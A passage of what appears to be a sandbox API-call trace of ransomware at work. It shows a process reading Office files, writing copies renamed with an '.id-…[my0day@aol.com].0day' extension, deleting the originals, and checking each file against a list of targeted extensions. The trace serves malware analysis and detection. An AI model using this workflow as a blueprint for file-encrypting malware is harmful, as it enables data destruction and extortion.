Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.376] lstrlenW (lpString=".doc") returned 4 [0057.376] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString=".docx") returned 5 [0057.376] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.376] lstrlenW (lpString=".pdf") returned 4 [0057.376] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString=".xls") returned 4 [0057.376] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.376] lstrlenW (lpString=".xlsx") returned 5 [0057.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.376] lstrlenW (lpString=".ppt") returned 4 [0057.376] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.376] lstrlenW (lpString=".zip") returned 4 [0057.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.376] lstrlenW (lpString=".rar") returned 4 [0057.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString=".bz2") returned 4 [0057.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString=".7z") returned 3 [0057.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.376] lstrlenW (lpString=".dbf") returned 4 [0057.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.376] lstrlenW (lpString=".1cd") returned 4 [0057.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0057.377] lstrlenW (lpString=".jpg") returned 4 [0057.377] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.377] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.377] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0057.829] GetLastError () returned 0x0 [0057.829] ReadFile (hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0) Thread: id = 11 os_tid = 0xab0 [0032.546] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x6afeb0 [0032.546] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x6bfeb8 [0032.546] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402d8 [0032.547] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x643098 [0032.547] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402f0 [0032.547] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x34c0020 [0032.547] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640308 [0032.547] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640308, Size=0x20) returned 0x625c08 [0032.547] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640308 [0032.547] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640308, Size=0x20) returned 0x625d70 [0032.547] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.547] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.547] Wow64DisableWow64FsRedirection (in: OldValue=0x2c5ff58 | out: OldValue=0x2c5ff58*=0x0) returned 1 [0032.547] lstrlenW (lpString="kernel32.dll") returned 12 [0032.547] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.547] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.547] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d70 | out: hHeap=0x5f0000) returned 1 [0032.547] Sleep (dwMilliseconds=0x64) [0032.737] Sleep (dwMilliseconds=0x64) [0033.045] Sleep (dwMilliseconds=0x64) [0033.820] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.820] lstrlenW (lpString="ExcelMUI.xml") returned 12 [0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.821] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1565) returned 1 [0033.821] CloseHandle (hObject=0x180) returned 1 [0033.821] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0033.821] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.821] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.821] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.822] GetLastError () returned 0x0 [0033.822] ReadFile (in: hFile=0x180, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x61d, lpOverlapped=0x0) returned 1 [0033.834] WriteFile (in: hFile=0x184, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x620, lpOverlapped=0x0) returned 1 [0033.835] ReadFile (in: hFile=0x180, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.835] WriteFile (in: hFile=0x184, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.835] SetEndOfFile (hFile=0x184) returned 1 [0033.835] CloseHandle (hObject=0x184) returned 1 [0033.836] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.836] SetEndOfFile (hFile=0x180) returned 1 [0033.837] CloseHandle (hObject=0x180) returned 1 [0033.837] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0033.837] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0033.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.837] lstrlenW (lpString=".doc") returned 4 [0033.837] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.837] lstrlenW (lpString=".docx") returned 5 [0033.837] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.837] lstrlenW (lpString=".pdf") returned 4 [0033.837] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.837] lstrlenW (lpString=".xls") returned 4 [0033.837] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.837] lstrlenW (lpString=".xlsx") returned 5 [0033.837] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.837] lstrlenW (lpString=".ppt") returned 4 [0033.837] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".zip") returned 4 [0033.838] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.838] lstrlenW (lpString=".rar") returned 4 [0033.838] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString=".bz2") returned 4 [0033.838] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString=".7z") returned 3 [0033.838] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".dbf") returned 4 [0033.838] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".1cd") returned 4 [0033.838] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".jpg") returned 4 [0033.838] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".doc") returned 4 [0033.838] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString=".docx") returned 5 [0033.838] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.838] lstrlenW (lpString=".pdf") returned 4 [0033.838] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString=".xls") returned 4 [0033.838] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString=".xlsx") returned 5 [0033.838] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.838] lstrlenW (lpString=".ppt") returned 4 [0033.838] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.838] lstrlenW (lpString=".zip") returned 4 [0033.839] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.839] lstrlenW (lpString=".rar") returned 4 [0033.839] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.839] lstrlenW (lpString=".bz2") returned 4 [0033.839] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.839] lstrlenW (lpString=".7z") returned 3 [0033.839] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.839] lstrlenW (lpString=".dbf") returned 4 [0033.839] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.839] lstrlenW (lpString=".1cd") returned 4 [0033.839] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.839] lstrlenW (lpString=".jpg") returned 4 [0033.839] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.839] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.839] lstrlenW (lpString="Setup.xml") returned 9 [0033.839] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.840] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2296) returned 1 [0033.840] CloseHandle (hObject=0x180) returned 1 [0033.840] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.840] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.840] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.841] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.841] GetLastError () returned 0x0 [0033.841] ReadFile (in: hFile=0x180, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0033.842] WriteFile (in: hFile=0x184, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x900, lpOverlapped=0x0) returned 1 [0033.843] ReadFile (in: hFile=0x180, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.843] WriteFile (in: hFile=0x184, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0033.843] SetEndOfFile (hFile=0x184) returned 1 [0033.843] CloseHandle (hObject=0x184) returned 1 [0033.844] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.844] SetEndOfFile (hFile=0x180) returned 1 [0033.845] CloseHandle (hObject=0x180) returned 1 [0033.845] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0033.845] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0033.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.845] lstrlenW (lpString=".doc") returned 4 [0033.845] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.845] lstrlenW (lpString=".docx") returned 5 [0033.845] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.845] lstrlenW (lpString=".pdf") returned 4 [0033.845] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.845] lstrlenW (lpString=".xls") returned 4 [0033.845] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.845] lstrlenW (lpString=".xlsx") returned 5 [0033.845] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.845] lstrlenW (lpString=".ppt") returned 4 [0033.845] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.845] lstrlenW (lpString=".zip") returned 4 [0033.845] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.846] lstrlenW (lpString=".rar") returned 4 [0033.846] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".bz2") returned 4 [0033.846] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".7z") returned 3 [0033.846] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString=".dbf") returned 4 [0033.846] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString=".1cd") returned 4 [0033.846] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString=".jpg") returned 4 [0033.846] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString=".doc") returned 4 [0033.846] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".docx") returned 5 [0033.846] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.846] lstrlenW (lpString=".pdf") returned 4 [0033.846] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".xls") returned 4 [0033.846] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".xlsx") returned 5 [0033.846] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.846] lstrlenW (lpString=".ppt") returned 4 [0033.846] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.846] lstrlenW (lpString=".zip") returned 4 [0033.846] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.846] lstrlenW (lpString=".rar") returned 4 [0033.846] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.846] lstrlenW (lpString=".bz2") returned 4 [0033.847] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.847] lstrlenW (lpString=".7z") returned 3 [0033.847] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.847] lstrlenW (lpString=".dbf") returned 4 [0033.847] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.847] lstrlenW (lpString=".1cd") returned 4 [0033.847] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.847] lstrlenW (lpString=".jpg") returned 4 [0033.847] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.847] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.847] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0033.847] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.848] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1450) returned 1 [0033.848] CloseHandle (hObject=0x184) returned 1 [0033.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0033.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.848] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.848] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.849] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.849] GetLastError () returned 0x0 [0033.849] ReadFile (in: hFile=0x184, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0033.850] WriteFile (in: hFile=0x188, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0033.851] ReadFile (in: hFile=0x184, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.851] WriteFile (in: hFile=0x188, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xf6, 